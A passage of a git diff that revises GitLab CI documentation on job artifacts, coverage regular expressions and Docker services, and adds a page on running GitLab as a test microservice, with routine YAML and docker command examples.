11.5 and above. +If you run two types of pipelines (like branch and scheduled) for the same ref, +the pipeline that finishes later creates the job artifact. -The `codequality` report collects [Code Quality issues](../../user/project/merge_requests/code_quality.md) -as artifacts. +For more examples, view the [keyword reference for the `.gitlab-ci.yml` file](../yaml/README.md#artifacts). -The collected Code Quality report uploads to GitLab as an artifact and is summarized in merge requests. +## Download job artifacts -#### `artifacts:reports:sast` +You can download job artifacts or view the job archive: -> - Introduced in GitLab 11.5. -> - Made [available in all tiers](https://gitlab.com/groups/gitlab-org/-/epics/2098) in GitLab 13.3. -> - Requires GitLab Runner 11.5 and above. +- On the **Pipelines** page, to the right of the pipeline: -The `sast` report collects [SAST vulnerabilities](../../user/application_security/sast/index.md) -as artifacts. +  -The collected SAST report uploads to GitLab as an artifact and is summarized -in merge requests and the pipeline view. It's also used to provide data for security -dashboards. +- On the **Jobs** page, to the right of the job: -#### `artifacts:reports:secret_detection` +  -> - Introduced in GitLab 13.1. -> - Made [available in all tiers](https://gitlab.com/gitlab-org/gitlab/-/issues/222788) in GitLab - 13.3. -> - Requires GitLab Runner 11.5 and above. +- On a job's detail page. The **Keep** button indicates an `expire_in` value was set: -The `secret-detection` report collects [detected secrets](../../user/application_security/secret_detection/index.md) -as artifacts. +  -The collected Secret Detection report is uploaded to GitLab as an artifact and summarized -in the merge requests and pipeline view. It's also used to provide data for security -dashboards. +- On a merge request, by the pipeline details: -#### `artifacts:reports:dependency_scanning` **(ULTIMATE)** +  -> - Introduced in GitLab 11.5. -> - Requires GitLab Runner 11.5 and above. +- When browsing an archive: -The `dependency_scanning` report collects [Dependency Scanning vulnerabilities](../../user/application_security/dependency_scanning/index.md) -as artifacts. +  -The collected Dependency Scanning report uploads to GitLab as an artifact and is summarized in merge requests and the pipeline view. It's also used to provide data for security -dashboards. + If [GitLab Pages](../../administration/pages/index.md) is enabled in the project, you can preview + HTML files in the artifacts directly in your browser. If the project is internal or private, you must + enable [GitLab Pages access control](../../administration/pages/index.md#access-control) to preview + HTML files. -#### `artifacts:reports:container_scanning` **(ULTIMATE)** +## View failed job artifacts -> - Introduced in GitLab 11.5. -> - Requires GitLab Runner 11.5 and above. - -The `container_scanning` report collects [Container Scanning vulnerabilities](../../user/application_security/container_scanning/index.md) -as artifacts. - -The collected Container Scanning report uploads to GitLab as an artifact and -is summarized in merge requests and the pipeline view. It's also used to provide data for security -dashboards. - -#### `artifacts:reports:dast` **(ULTIMATE)** - -> - Introduced in GitLab 11.5. -> - Requires GitLab Runner 11.5 and above. - -The `dast` report collects [DAST vulnerabilities](../../user/application_security/dast/index.md) -as artifacts. - -The collected DAST report uploads to GitLab as an artifact and is summarized in merge requests and the pipeline view. It's also used to provide data for security -dashboards. - -#### `artifacts:reports:api_fuzzing` **(ULTIMATE)** - -> - Introduced in GitLab 13.4. -> - Requires GitLab Runner 13.4 or later. - -The `api_fuzzing` report collects [API Fuzzing bugs](../../user/application_security/api_fuzzing/index.md) -as artifacts. - -The collected API Fuzzing report uploads to GitLab as an artifact and is summarized in merge -requests and the pipeline view. It's also used to provide data for security dashboards. - -#### `artifacts:reports:coverage_fuzzing` **(ULTIMATE)** - -> - Introduced in GitLab 13.4. -> - Requires GitLab Runner 13.4 or later. - -The `coverage_fuzzing` report collects [coverage fuzzing bugs](../../user/application_security/coverage_fuzzing/index.md) -as artifacts. - -The collected coverage fuzzing report uploads to GitLab as an artifact and is summarized in merge -requests and the pipeline view. It's also used to provide data for security dashboards. +If the latest job has failed to upload the artifacts, you can see that +information in the UI. -#### `artifacts:reports:license_management` **(ULTIMATE)** + -> - Introduced in GitLab 11.5. -> - Requires GitLab Runner 11.5 and above. +## Delete job artifacts WARNING: -This artifact is still valid but is **deprecated** in favor of the -[artifacts:reports:license_scanning](../pipelines/job_artifacts.md#artifactsreportslicense_scanning) -introduced in GitLab 12.8. - -The `license_management` report collects [Licenses](../../user/compliance/license_compliance/index.md) -as artifacts. - -The collected License Compliance report uploads to GitLab as an artifact and is summarized in merge requests and the pipeline view. It's also used to provide data for security -dashboards. - -#### `artifacts:reports:license_scanning` **(ULTIMATE)** - -> - Introduced in GitLab 12.8. -> - Requires GitLab Runner 11.5 and above. - -The `license_scanning` report collects [Licenses](../../user/compliance/license_compliance/index.md) -as artifacts. - -The License Compliance report uploads to GitLab as an artifact and displays automatically in merge requests and the pipeline view, and provide data for security -dashboards. - -#### `artifacts:reports:performance` **(PREMIUM)** - -> - Introduced in GitLab 11.5. -> - Requires GitLab Runner 11.5 and above. - -The `performance` report collects [Browser Performance Testing metrics](../../user/project/merge_requests/browser_performance_testing.md) -as artifacts. - -The collected Browser Performance report uploads to GitLab as an artifact and displays in merge requests. - -#### `artifacts:reports:load_performance` **(PREMIUM)** - -> - Introduced in [GitLab 13.2](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/35260) in [GitLab Premium](https://about.gitlab.com/pricing/) 13.2. -> - Requires GitLab Runner 11.5 and above. - -The `load_performance` report collects [Load Performance Testing metrics](../../user/project/merge_requests/load_performance_testing.md) -as artifacts. - -The report is uploaded to GitLab as an artifact and is -shown in merge requests automatically. - -#### `artifacts:reports:metrics` **(PREMIUM)** - -> Introduced in GitLab 11.10. - -The `metrics` report collects [Metrics](../metrics_reports.md) -as artifacts. - -The collected Metrics report uploads to GitLab as an artifact and displays in merge requests. - -#### `artifacts:reports:requirements` **(ULTIMATE)** - -> - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/2859) in GitLab 13.1. -> - Requires GitLab Runner 11.5 and above. - -The `requirements` report collects `requirements.json` files as artifacts. - -The collected Requirements report uploads to GitLab as an artifact and -existing [requirements](../../user/project/requirements/index.md) are -marked as Satisfied. - -## Browsing artifacts - -> - From GitLab 9.2, PDFs, images, videos, and other formats can be previewed directly in the job artifacts browser without the need to download them. -> - Introduced in [GitLab 10.1](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/14399), HTML files in a public project can be previewed directly in a new tab without the need to download them when [GitLab Pages](../../administration/pages/index.md) is enabled. The same applies for textual formats (currently supported extensions: `.txt`, `.json`, and `.log`). -> - Introduced in [GitLab 12.4](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/16675), artifacts in internal and private projects can be previewed when [GitLab Pages access control](../../administration/pages/index.md#access-control) is enabled. - -After a job finishes, if you visit the job's specific page, there are three -buttons. You can download the artifacts archive or browse its contents, whereas -the **Keep** button appears only if you've set an [expiry date](../yaml/README.md#artifactsexpire_in) to the -artifacts in case you changed your mind and want to keep them. - - - -The archive browser shows the name and the actual file size of each file in the -archive. If your artifacts contained directories, then you're also able to -browse inside them. - -Below you can see what browsing looks like. In this case we have browsed inside -the archive and at this point there is one directory, a couple files, and -one HTML file that you can view directly online when -[GitLab Pages](../../administration/pages/index.md) is enabled (opens in a new tab). -Select artifacts in internal and private projects can only be previewed when -[GitLab Pages access control](../../administration/pages/index.md#access-control) is enabled. - - - -## Downloading artifacts - -If you need to download an artifact or the whole archive, there are buttons in various places -in the GitLab UI to do this: - -1. While on the pipelines page, you can see the download icon for each job's - artifacts and archive in the right corner: - -  - -1. While on the **Jobs** page, you can see the download icon for each job's - artifacts and archive in the right corner: - -  - -1. While inside a specific job, you're presented with a download button - along with the one that browses the archive: - -  +This is a destructive action that leads to data loss. Use with caution. -1. While on the details page of a merge request, you can see the download - icon for each job's artifacts on the right side of the merge request widget: +You can delete a single job, which also removes the job's +artifacts and log. You must be: -  +- The owner of the job. +- A [maintainer](../../user/permissions.md#gitlab-cicd-permissions) of the project. -1. And finally, when browsing an archive you can see the download button at - the top right corner: +To delete a job: -  +1. Go to a job's detail page. +1. At the top right of the job's log, select the trash icon. +1. Confirm the deletion. -## Downloading the latest artifacts +## Retrieve job artifacts for other projects -It's possible to download the latest artifacts of a job via a well known URL -so you can use it for scripting purposes. +To retrieve a job artifact from a different project, you might need to use a +private token to [authenticate and download](../../api/job_artifacts.md#get-job-artifacts) +the artifact. -NOTE: -The latest artifacts are created by jobs in the **most recent** successful pipeline -for the specific ref. If you run two types of pipelines for the same ref, timing determines the latest -artifact. For example, if a merge request creates a branch pipeline at the same time as a scheduled pipeline, the pipeline that completed most recently creates the latest artifact. +## How searching for job artifacts works In [GitLab 13.5](https://gitlab.com/gitlab-org/gitlab/-/issues/201784) and later, artifacts for [parent and child pipelines](../parent_child_pipelines.md) are searched in hierarchical order from parent to child. For example, if both parent and child pipelines have a -job with the same name, the artifact from the parent pipeline is returned. +job with the same name, the job artifact from the parent pipeline is returned. -Artifacts for other pipelines can be accessed with direct access to them. +## Access the latest job artifacts by URL -The structure of the URL to download the whole artifacts archive is the following: +You can download the latest job artifacts by using a URL. + +To download the whole artifacts archive: ```plaintext https://example.com/<namespace>/<project>/-/jobs/artifacts/<ref>/download?job=<job_name> ``` -To download a single file from the artifacts use the following URL: +To download a single file from the artifacts: ```plaintext https://example.com/<namespace>/<project>/-/jobs/artifacts/<ref>/raw/<path_to_file>?job=<job_name> ``` -For example, to download the latest artifacts of the job named `coverage` of -the `master` branch of the `gitlab` project that belongs to the `gitlab-org` -namespace, the URL would be: +For example, to download the latest artifacts of the job named `coverage` in +the `main` branch of the `gitlab` project in the `gitlab-org` +namespace: ```plaintext -https://gitlab.com/gitlab-org/gitlab/-/jobs/artifacts/master/download?job=coverage +https://gitlab.com/gitlab-org/gitlab/-/jobs/artifacts/main/download?job=coverage ``` -To download the file `coverage/index.html` from the same -artifacts use the following URL: +To download the file `coverage/index.html` from the same artifacts: ```plaintext https://gitlab.com/gitlab-org/gitlab/-/jobs/artifacts/master/raw/coverage/index.html?job=coverage ``` -There is also a URL to browse the latest job artifacts: +To browse the latest job artifacts: ```plaintext https://example.com/<namespace>/<project>/-/jobs/artifacts/<ref>/browse?job=<job_name> @@ -418,97 +158,51 @@ For example: https://gitlab.com/gitlab-org/gitlab/-/jobs/artifacts/master/browse?job=coverage ``` -There is also a URL to specific files, including HTML files that +To download specific files, including HTML files that are shown in [GitLab Pages](../../administration/pages/index.md): ```plaintext https://example.com/<namespace>/<project>/-/jobs/artifacts/<ref>/file/<path>?job=<job_name> ``` -For example, when a job `coverage` creates the artifact `htmlcov/index.html`, -you can access it at: +For example, when a job `coverage` creates the artifact `htmlcov/index.html`: ```plaintext https://gitlab.com/gitlab-org/gitlab/-/jobs/artifacts/master/file/htmlcov/index.html?job=coverage ``` -The latest builds are also exposed in the UI in various places. Specifically, -look for the download button in: - -- The main project's page -- The branches page -- The tags page - -If the latest job has failed to upload the artifacts, you can see that -information in the UI. - - - -## Erasing artifacts - -WARNING: -This is a destructive action that leads to data loss. Use with caution. - -You can erase a single job via the UI, which also removes the job's -artifacts and trace, if you are: - -- The owner of the job. -- A [Maintainer](../../user/permissions.md#gitlab-cicd-permissions) of the project. - -To erase a job: +## When job artifacts are deleted -1. Navigate to a job's page. -1. Click the trash icon at the top right of the job's trace. -1. Confirm the deletion. - -## Retrieve artifacts of private projects when using GitLab CI - -To retrieve a job artifact from a different project, you might need to use a -private token to [authenticate and download](../../api/job_artifacts.md#get-job-artifacts) -the artifact. +By default, the latest job artifacts from the most recent successful jobs are never deleted. +If a job is configured with [`expire_in`](../yaml/README.md#artifactsexpire_in), +its artifacts only expire if a more recent artifact exists. -## Keep artifacts from most recent successful jobs +### Keep artifacts from most recent successful jobs > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/16267) in GitLab 13.0. > - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/229936) in GitLab 13.4. > - [Made optional with a CI/CD setting](https://gitlab.com/gitlab-org/gitlab/-/issues/241026) in GitLab 13.8. -By default, the latest artifacts from the most recent successful jobs are never deleted. -If a job is configured with [`expire_in`](../yaml/README.md#artifactsexpire_in), -its artifacts only expire if a more recent artifact exists. - Keeping the latest artifacts can use a large amount of storage space in projects with a lot of jobs or large artifacts. If the latest artifacts are not needed in a project, you can disable this behavior to save space: -1. Navigate to **Settings > CI/CD > Artifacts**. -1. Uncheck **Keep artifacts from most recent successful jobs**. +1. Go to the project's **Settings > CI/CD > Artifacts**. +1. Clear the **Keep artifacts from most recent successful jobs** checkbox. You can disable this behavior for all projects on a self-managed instance in the -[instance's CI/CD settings](../../user/admin_area/settings/continuous_integration.md#keep-the-latest-artifacts-for-all-jobs-in-the-latest-successful-pipelines). **(CORE ONLY)** +[instance's CI/CD settings](../../user/admin_area/settings/continuous_integration.md#keep-the-latest-artifacts-for-all-jobs-in-the-latest-successful-pipelines). When you disable the feature, the latest artifacts do not immediately expire. A new pipeline must run before the latest artifacts can expire and be deleted. -## Troubleshooting +## Troubleshooting job artifacts ### Error message `No files to upload` -This is often preceded by other errors or warnings that specify the filename and why it wasn't -generated in the first place. Please check the entire job log for such messages. +This message is often preceded by other errors or warnings that specify the filename and why it wasn't +generated. Check the job log for these messages. -If you find no helpful messages, please retry the failed job after activating +If you find no helpful messages, retry the failed job after activating [CI/CD debug logging](../variables/README.md#debug-logging). -This provides useful information to investigate further. - -<!-- ## Troubleshooting - -Include any troubleshooting steps that you can foresee. If you know beforehand what issues -one might have when setting this up, or when something is changed, or on upgrading, it's -important to describe those, too. Think of things that may go wrong and include them here. -This is important to minimize requests for support, and to avoid doc comments with -questions that you know someone might ask. - -Each scenario can be a third-level heading, e.g. `### Getting error message X`. -If you have none to add when creating a doc, leave this section in place -but commented out to help encourage others to add to it in the future. --> +This logging should provide information to help you investigate further. diff --git a/doc/ci/pipelines/settings.md b/doc/ci/pipelines/settings.md index e607bae53bd..31e42a2cb68 100644 --- a/doc/ci/pipelines/settings.md +++ b/doc/ci/pipelines/settings.md @@ -137,21 +137,19 @@ averaged. <!-- vale gitlab.Spelling = NO --> -| Coverage Tool | Sample regular expression | -|------------------------------------------------|-----------------------------------------------| -| Simplecov (Ruby) | `\(\d+.\d+\%\) covered` | -| pytest-cov (Python) | `^TOTAL.+?(\d+\%)$` | -| Scoverage (Scala) | `Statement coverage[A-Za-z\.*]\s*:\s*([^%]+)` | -| `phpunit --coverage-text --colors=never` (PHP) | `^\s*Lines:\s*\d+.\d+\%` | -| gcovr (C/C++) | `^TOTAL.*\s+(\d+\%)$` | -| `tap --coverage-report=text-summary` (NodeJS) | `^Statements\s*:\s*([^%]+)` | -| `nyc npm test` (NodeJS) | `All files[^|]*\|[^|]*\s+([\d\.]+)` | -| excoveralls (Elixir) | `\[TOTAL\]\s+(\d+\.\d+)%` | -| `mix test --cover` (Elixir) | `\d+.\d+\%\s+\|\s+Total` | -| JaCoCo (Java/Kotlin) | `Total.*?([0-9]{1,3})%` | -| `go test -cover` (Go) | `coverage: \d+.\d+% of statements` | -| .Net (OpenCover) | `(Visited Points).*\((.*)\)` | -| .Net (`dotnet test` line coverage) | `Total\s*\|\s*(\d+\.?\d+)` | +- Simplecov (Ruby). Example: `\(\d+.\d+\%\) covered`. +- pytest-cov (Python). Example: `^TOTAL.+?(\d+\%)$`. +- Scoverage (Scala). Example: `Statement coverage[A-Za-z\.*]\s*:\s*([^%]+)`. +- `phpunit --coverage-text --colors=never` (PHP). Example: `^\s*Lines:\s*\d+.\d+\%`. +- gcovr (C/C++). Example: `^TOTAL.*\s+(\d+\%)$`. +- `tap --coverage-report=text-summary` (NodeJS). Example: `^Statements\s*:\s*([^%]+)`. +- `nyc npm test` (NodeJS). Example: `All files[^|]*\|[^|]*\s+([\d\.]+)`. +- excoveralls (Elixir). Example: `\[TOTAL\]\s+(\d+\.\d+)%`. +- `mix test --cover` (Elixir). Example: `\d+.\d+\%\s+\|\s+Total`. +- JaCoCo (Java/Kotlin). Example: `Total.*?([0-9]{1,3})%`. +- `go test -cover` (Go). Example: `coverage: \d+.\d+% of statements`. +- .Net (OpenCover). Example: `(Visited Points).*\((.*)\)`. +- .Net (`dotnet test` line coverage). Example: `Total\s*\|\s*(\d+\.?\d+)`. <!-- vale gitlab.Spelling = YES --> diff --git a/doc/ci/quick_start/index.md b/doc/ci/quick_start/index.md index 664523a08e4..d20a0f0d4a1 100644 --- a/doc/ci/quick_start/index.md +++ b/doc/ci/quick_start/index.md @@ -161,4 +161,4 @@ To view your pipeline:  -If the job status is `stuck`, check to ensure a runner is probably configured for the project. +If the job status is `stuck`, check to ensure a runner is properly configured for the project. diff --git a/doc/ci/secrets/index.md b/doc/ci/secrets/index.md index eac72bc7351..d140344b40d 100644 --- a/doc/ci/secrets/index.md +++ b/doc/ci/secrets/index.md @@ -114,7 +114,7 @@ In this example: After GitLab fetches the secret from Vault, the value is saved in a temporary file. The path to this file is stored in a CI/CD variable named `DATABASE_PASSWORD`, -similar to [variables of type `file`](../variables/README.md#custom-cicd-variables-of-type-file). +similar to [variables of type `file`](../variables/README.md#cicd-variable-types). For more information about the supported syntax, read the [`.gitlab-ci.yml` reference](../yaml/README.md#secretsvault). diff --git a/doc/ci/services/gitlab.md b/doc/ci/services/gitlab.md new file mode 100644 index 00000000000..8a582cc87eb --- /dev/null +++ b/doc/ci/services/gitlab.md @@ -0,0 +1,40 @@ +--- +stage: Verify +group: Runner +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +type: reference +--- + +# Use GitLab as a microservice + +Many applications need to access JSON APIs, so application tests might need access +to APIs too. The following example shows how to use GitLab as a microservice to give +tests access to the GitLab API. + +1. Configure a [runner](../runners/README.md) with the Docker or Kubernetes executor. +1. In your `.gitlab-ci.yml` add: + + ```yaml + services: + - name: gitlab/gitlab-ce:latest + alias: gitlab + + variables: + GITLAB_HTTPS: "false" # ensure that plain http works + GITLAB_ROOT_PASSWORD: "password" # to access the api with user root:password + ``` + +1. To set values for the `GITLAB_HTTPS` and `GITLAB_ROOT_PASSWORD`, + [assign them to a variable in the user interface](../variables/README.md#project-cicd-variables). + Then assign that variable to the corresponding variable in your + `.gitlab-ci.yml` file. + +Then, commands in `script:` sections in your `.gitlab-ci.yml` file can access the API at `http://gitlab/api/v4`. + +For more information about why `gitlab` is used for the `Host`, see +[How services are linked to the job](../docker/using_docker_images.md#extended-docker-configuration-options). + +You can also use any other Docker image available on [Docker Hub](https://hub.docker.com/u/gitlab). + +The `gitlab` image can accept environment variables. For more details, +see the [Omnibus documentation](../../install/README.md). diff --git a/doc/ci/services/index.md b/doc/ci/services/index.md index 71c2be70de3..8d603b17e2e 100644 --- a/doc/ci/services/index.md +++ b/doc/ci/services/index.md @@ -6,16 +6,376 @@ comments: false type: index --- -# GitLab CI services examples +# Services -The [`services`](../docker/using_docker_images.md#what-is-a-service) -keyword defines a Docker image that runs during a `job` linked to the -Docker image that the image keyword defines. This allows you to access -the service image during build time. +The `services` keyword defines a Docker image that runs during a `job` +linked to the Docker image that the image keyword defines. This allows +you to access the service image during build time. The service image can run any application, but the most common use case is to run a database container, for example: -- [Using MySQL](mysql.md) -- [Using PostgreSQL](postgres.md) -- [Using Redis](redis.md) +- [MySQL](mysql.md) +- [PostgreSQL](postgres.md) +- [Redis](redis.md) +- [GitLab](gitlab.md) as an example for a microservice offering a JSON API + +It's easier and faster to use an existing image and run it as an additional container +than to install `mysql`, for example, every time the project is built. + +You're not limited to only database services. You can add as many +services you need to `.gitlab-ci.yml` or manually modify `config.toml`. +Any image found at [Docker Hub](https://hub.docker.com/) or your private Container Registry can be +used as a service. + +Services inherit the same DNS servers, search domains, and additional hosts as +the CI container itself. + +## How services are linked to the job + +To better understand how container linking works, read +[Linking containers together](https://docs.docker.com/engine/userguide/networking/default_network/dockerlinks/). + +If you add `mysql` as service to your application, the image is +used to create a container that's linked to the job container. + +The service container for MySQL is accessible under the hostname `mysql`. +To access your database service, connect to the host named `mysql` instead of a +socket or `localhost`. Read more in [accessing the services](#accessing-the-services). + +## How the health check of services works + +Services are designed to provide additional features which are **network accessible**. +They may be a database like MySQL, or Redis, and even `docker:stable-dind` which +allows you to use Docker-in-Docker. It can be practically anything that's +required for the CI/CD job to proceed, and is accessed by network. + +To make sure this works, the runner: + +1. Checks which ports are exposed from the container by default. +1. Starts a special container that waits for these ports to be accessible. + +If the second stage of the check fails, it prints the warning: `*** WARNING: Service XYZ probably didn't start properly`. +This issue can occur because: + +- There is no opened port in the service. +- The service was not started properly before the timeout, and the port is not + responding. + +In most cases it affects the job, but there may be situations when the job +still succeeds even if that warning was printed. For example: + +- The service was started shortly after the warning was raised, and the job is + not using the linked service from the beginning. In that case, when the + job needed to access the service, it may have been already there waiting for + connections. +- The service container is not providing any networking service, but it's doing + something with the job's directory (all services have the job directory mounted + as a volume under `/builds`). In that case, the service does its job, and + because the job is not trying to connect to it, it does not fail. + +## What services are not for + +As mentioned before, this feature is designed to provide **network accessible** +services. A database is the simplest example of such a service. + +The services feature is not designed to, and does not, add any software from the +defined `services` image(s) to the job's container. + +For example, if you have the following `services` defined in your job, the `php`, +`node` or `go` commands are **not** available for your script, and the job fails: + +```yaml +job: + services: + - php:7 + - node:latest + - golang:1.10 + image: alpine:3.7 + script: + - php -v + - node -v + - go version +``` + +If you need to have `php`, `node` and `go` available for your script, you should +either: + +- Choose an existing Docker image that contains all required tools. +- Create your own Docker image, with all the required tools included, + and use that in your job. + +## Define `services` in the `.gitlab-ci.yml` file + +It's also possible to define different images and services per job: + +```yaml +default: + before_script: + - bundle install + +test:2.6: + image: ruby:2.6 + services: + - postgres:11.7 + script: + - bundle exec rake spec + +test:2.7: + image: ruby:2.7 + services: + - postgres:12.2 + script: + - bundle exec rake spec +``` + +Or you can pass some [extended configuration options](../docker/using_docker_images.md#extended-docker-configuration-options) +for `image` and `services`: + +```yaml +default: + image: + name: ruby:2.6 + entrypoint: ["/bin/bash"] + + services: + - name: my-postgres:11.7 + alias: db-postgres + entrypoint: ["/usr/local/bin/db-postgres"] + command: ["start"] + + before_script: + - bundle install + +test: + script: + - bundle exec rake spec +``` + +## Accessing the services + +Let's say that you need a Wordpress instance to test some API integration with +your application. You can then use for example the +[`tutum/wordpress`](https://hub.docker.com/r/tutum/wordpress/) image in your +`.gitlab-ci.yml` file: + +```yaml +services: + - tutum/wordpress:latest +``` + +If you don't [specify a service alias](#available-settings-for-services), +when the job runs, `tutum/wordpress` is started. You have +access to it from your build container under two hostnames: + +- `tutum-wordpress` +- `tutum__wordpress` + +Hostnames with underscores are not RFC valid and may cause problems in third-party +applications. + +The default aliases for the service's hostname are created from its image name +following these rules: + +- Everything after the colon (`:`) is stripped. +- Slash (`/`) is replaced with double underscores (`__`) and the primary alias + is created. +- Slash (`/`) is replaced with a single dash (`-`) and the secondary alias is + created (requires GitLab Runner v1.1.0 or higher). + +To override the default behavior, you can +[specify a service alias](#available-settings-for-services). + +## Passing CI/CD variables to services + +You can also pass custom CI/CD [variables](../variables/README.md) +to fine tune your Docker `images` and `services` directly in the `.gitlab-ci.yml` file. +For more information, read about [`.gitlab-ci.yml` defined variables](../variables/README.md#create-a-custom-cicd-variable-in-the-gitlab-ciyml-file). + +```yaml +# The following variables are automatically passed down to the Postgres container +# as well as the Ruby container and available within each. +variables: + HTTPS_PROXY: "https://10.1.1.1:8090" + HTTP_PROXY: "https://10.1.1.1:8090" + POSTGRES_DB: "my_custom_db" + POSTGRES_USER: "postgres" + POSTGRES_PASSWORD: "example" + PGDATA: "/var/lib/postgresql/data" + POSTGRES_INITDB_ARGS: "--encoding=UTF8 --data-checksums" + +services: + - name: postgres:11.7 + alias: db + entrypoint: ["docker-entrypoint.sh"] + command: ["postgres"] + +image: + name: ruby:2.6 + entrypoint: ["/bin/bash"] + +before_script: + - bundle install + +test: + script: + - bundle exec rake spec +``` + +## Available settings for `services` + +> Introduced in GitLab and GitLab Runner 9.4. + +| Setting | Required | GitLab version | Description | +|------------|----------|----------------| ----------- | +| `name` | yes, when used with any other option | 9.4 | Full name of the image to use. It should contain the Registry part if needed. | +| `entrypoint` | no | 9.4 |Command or script to execute as the container's entrypoint. It's translated to Docker's `--entrypoint` option while creating the container. The syntax is similar to [`Dockerfile`'s `ENTRYPOINT`](https://docs.docker.com/engine/reference/builder/#entrypoint) directive, where each shell token is a separate string in the array. | +| `command` | no | 9.4 |Command or script that should be used as the container's command. It's translated to arguments passed to Docker after the image's name. The syntax is similar to [`Dockerfile`'s `CMD`](https://docs.docker.com/engine/reference/builder/#cmd) directive, where each shell token is a separate string in the array. | +| `alias` (1) | no | 9.4 |Additional alias that can be used to access the service from the job's container. Read [Accessing the services](#accessing-the-services) for more information. | + +(1) Alias support for the Kubernetes executor was [introduced](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/2229) in GitLab Runner 12.8, and is only available for Kubernetes version 1.7 or later. + +## Starting multiple services from the same image + +> Introduced in GitLab and GitLab Runner 9.4. Read more about the [extended configuration options](../docker/using_docker_images.md#extended-docker-configuration-options). + +Before the new extended Docker configuration options, the following configuration +would not work properly: + +```yaml +services: + - mysql:latest + - mysql:latest +``` + +The runner would start two containers, each that uses the `mysql:latest` image. +However, both of them would be added to the job's container with the `mysql` alias, based on +the [default hostname naming](#accessing-the-services). This would end with one +of the services not being accessible. + +After the new extended Docker configuration options, the above example would +look like: + +```yaml +services: + - name: mysql:latest + alias: mysql-1 + - name: mysql:latest + alias: mysql-2 +``` + +The runner still starts two containers using the `mysql:latest` image, +however now each of them are also accessible with the alias configured +in `.gitlab-ci.yml` file. + +## Setting a command for the service + +> Introduced in GitLab and GitLab Runner 9.4. Read more about the [extended configuration options](../docker/using_docker_images.md#extended-docker-configuration-options). + +Let's assume you have a `super/sql:latest` image with some SQL database +in it. You would like to use it as a service for your job. Let's also +assume that this image does not start the database process while starting +the container. The user needs to manually use `/usr/bin/super-sql run` as +a command to start the database. + +Before the new extended Docker configuration options, you would need to: + +- Create your own image based on the `super/sql:latest` image. +- Add the default command. +- Use the image in the job's configuration: + + ```dockerfile + # my-super-sql:latest image's Dockerfile + + FROM super/sql:latest + CMD ["/usr/bin/super-sql", "run"] + ``` + + ```yaml + # .gitlab-ci.yml + + services: + - my-super-sql:latest + ``` + +After the new extended Docker configuration options, you can +set a `command` in the `.gitlab-ci.yml` file instead: + +```yaml +# .gitlab-ci.yml + +services: + - name: super/sql:latest + command: ["/usr/bin/super-sql", "run"] +``` + +The syntax of `command` is similar to [Dockerfile's `CMD`](https://docs.docker.com/engine/reference/builder/#cmd). + +## How Docker integration works + +Below is a high level overview of the steps performed by Docker during job +time. + +1. Create any service container: `mysql`, `postgresql`, `mongodb`, `redis`. +1. Create a cache container to store all volumes as defined in `config.toml` and + `Dockerfile` of build image (`ruby:2.6` as in above example). +1. Create a build container and link any service container to build container. +1. Start the build container, and send a job script to the container. +1. Run the job script. +1. Checkout code in: `/builds/group-name/project-name/`. +1. Run any step defined in `.gitlab-ci.yml`. +1. Check the exit status of build script. +1. Remove the build container and all created service containers. + +## Debug a job locally + +The following commands are run without root privileges. You should be +able to run Docker with your regular user account. + +First start with creating a file named `build_script`: + +```shell +cat <<EOF > build_script +git clone https://gitlab.com/gitlab-org/gitlab-runner.git /builds/gitlab-org/gitlab-runner +cd /builds/gitlab-org/gitlab-runner +make +EOF +``` + +Here we use as an example the GitLab Runner repository which contains a +Makefile, so running `make` executes the commands defined in the Makefile. +Instead of `make`, you could run the command which is specific to your project. + +Then create some service containers: + +```shell +docker run -d --name service-mysql mysql:latest +docker run -d --name service-postgres postgres:latest +``` + +This creates two service containers, named `service-mysql` and +`service-postgres` which use the latest MySQL and PostgreSQL images +respectively. They both run in the background (`-d`). + +Finally, create a build container by executing the `build_script` file we +created earlier: + +```shell +docker run --name build -i --link=service-mysql:mysql --link=service-postgres:postgres ruby:2.6 /bin/bash < build_script +``` + +The above command creates a container named `build` that's spawned from +the `ruby:2.6` image and has two services linked to it. The `build_script` is +piped using `stdin` to the bash interpreter which in turn executes the +`build_script` in the `build` container. + +When you finish testing and no longer need the containers, you can remove them +with: + +```shell +docker rm -f -v build service-mysql service-postgres +``` + +This forcefully (`-f`) removes the `build` container, the two service +containers, and all volumes (`-v`) that were created with the container +creation. diff --git a/doc/ci/services/mysql.md b/doc/ci/services/mysql.md index 5bd034cbf97..2185af0141d 100644 --- a/doc/ci/services/mysql.md +++ b/doc/ci/services/mysql.md @@ -14,7 +14,7 @@ need it for your tests to run. If you want to use a MySQL container, you can use [GitLab Runner](../runners/README.md) with the Docker executor. -1. [Create CI/CD variables](../variables/README.md#create-a-custom-variable-in-the-ui) for your +1. [Create CI/CD variables](../variables/README.md#custom-cicd-variables) for your MySQL database and password by going to **Settings > CI/CD**, expanding **Variables**, and clicking **Add Variable**. diff --git a/doc/ci/services/postgres.md b/doc/ci/services/postgres.md index 16576069583..8451d56a71c 100644 --- a/doc/ci/services/postgres.md +++ b/doc/ci/services/postgres.md @@ -31,7 +31,7 @@ variables: To set values for the `POSTGRES_DB`, `POSTGRES_USER`, `POSTGRES_PASSWORD` and `POSTGRES_HOST_AUTH_METHOD`, -[assign them to a CI/CD variable in the user interface](../variables/README.md#create-a-custom-variable-in-the-ui), +[assign them to a CI/CD variable in the user interface](../variables/README.md#custom-cicd-variables), then assign that variable to the corresponding variable in your `.gitlab-ci.yml` file. @@ -45,7 +45,7 @@ Database: nice_marmot ``` If you're wondering why we used `postgres` for the `Host`, read more at -[How services are linked to the job](../docker/using_docker_images.md#how-services-are-linked-to-the-job). +[How services are linked to the job](../services/index.md#how-services-are-linked-to-the-job). You can also use any other Docker image available on [Docker Hub](https://hub.docker.com/_/postgres). For example, to use PostgreSQL 9.3, the service becomes `postgres:9.3`. diff --git a/doc/ci/ssh_keys/index.md b/doc/ci/ssh_keys/index.md index 72a99efc9bc..c04ff35212c 100644 --- a/doc/ci/ssh_keys/index.md +++ b/doc/ci/ssh_keys/index.md @@ -36,7 +36,8 @@ with any type of [executor](https://docs.gitlab.com/runner/executors/) `~/.ssh/authorized_keys`) or add it as a [deploy key](../../user/project/deploy_keys/index.md) if 